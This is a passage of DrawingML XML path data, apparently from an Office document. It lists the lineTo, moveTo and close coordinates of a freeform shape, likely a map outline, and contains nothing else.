                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="575" y="687"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="577" y="684"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="581" y="684"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="586" y="683"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="590" y="688"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="589" y="689"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="586" y="692"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="696"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="581" y="702"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="582" y="704"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="581" y="706"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="579" y="707"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="571" y="710"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="567" y="715"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="449" y="640"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="444" y="643"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="442" y="644"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="442" y="647"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="443" y="651"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="445" y="654"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="658"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="445" y="661"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="443" y="663"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="437" y="662"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="435" y="660"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="434" y="659"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="433" y="657"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="432" y="654"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="427" y="657"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="423" y="658"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="421" y="658"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="418" y="656"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="416" y="650"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="414" y="647"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="647"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="407" y="647"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="405" y="647"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="644"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="632"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="406" y="629"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="627"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="613"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="397" y="612"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="612"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="388" y="613"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="382" y="617"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="380" y="617"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="379" y="617"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="379" y="615"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="380" y="610"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="379" y="605"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="379" y="601"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="594"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="388" y="591"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="586"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="395" y="581"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="574"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="396" y="554"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="395" y="553"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="553"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="390" y="552"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="388" y="550"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="386" y="543"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="539"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="380" y="537"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="537"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="376" y="540"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="376" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="371" y="540"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="366" y="539"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="361" y="538"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="359" y="538"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="358" y="537"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="359" y="535"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="532"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="528"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="523"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="353" y="519"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="343" y="526"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="527"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="334" y="524"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="332" y="523"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="329" y="523"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="526"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="317" y="532"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="311" y="534"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="307" y="537"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="297" y="548"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="291" y="550"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="286" y="550"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="285" y="551"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="282" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="280" y="544"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="277" y="544"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="266" y="543"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="542"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="260" y="539"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="539"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="540"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="542"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="547"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="240" y="559"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="239" y="554"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="239" y="547"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="238" y="545"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="545"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="233" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="547"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="545"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="223" y="548"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="547"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="547"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="213" y="544"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="208" y="542"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="542"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="545"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="545"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="542"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="545"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="542"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="191" y="538"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="539"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="538"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="536"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="533"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="533"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="535"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="527"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="525"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="522"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="521"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="522"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="523"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="517"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="514"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="515"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="514"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="506"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="501"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="500"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="501"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="501"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="505"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="508"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="507"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="499"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="499"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="497"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="489"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="490"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="483"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="481"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="484"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="483"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="480"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="475"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="471"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="466"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="460"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="459"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="464"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="463"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="461"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="458"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="449"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="448"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="445"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="443"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="438"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="433"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="427"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="424"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="423"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="418"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="406"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="403"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="397"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="397"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="396"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="385"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="382"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="380"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="380"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="381"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="377"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="376"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="375"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="377"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="376"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="375"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="374"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="374"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="371"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="370"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="366"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="359"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="355"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="354"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="354"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="349"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="345"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="343"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="343"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="342"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="344"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="344"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="338"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="319"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="317"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="308"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="302"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="301"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="302"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="307"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="308"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="303"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="296"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="291"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="291"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="293"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="293"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="292"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="282"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="274"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="271"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="269"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="259"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="255"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="191" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="206" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="208" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="208" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="208" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="214" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="218" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="225" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="228" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="240" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="246" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="260" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="275" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="277" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="276" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="274" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="270" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="270" y="193"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="271" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="272" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="277" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="285" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="296" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="303" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="308" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="319" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="343" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="354" y="250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="358" y="254"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="361" y="256"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="375" y="256"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="390" y="259"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="260"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="418" y="259"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="259"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="433" y="260"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="445" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="449" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="455" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="271"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="275"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="480" y="276"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="485" y="276"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="277"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="491" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="281"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="498" y="281"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="503" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
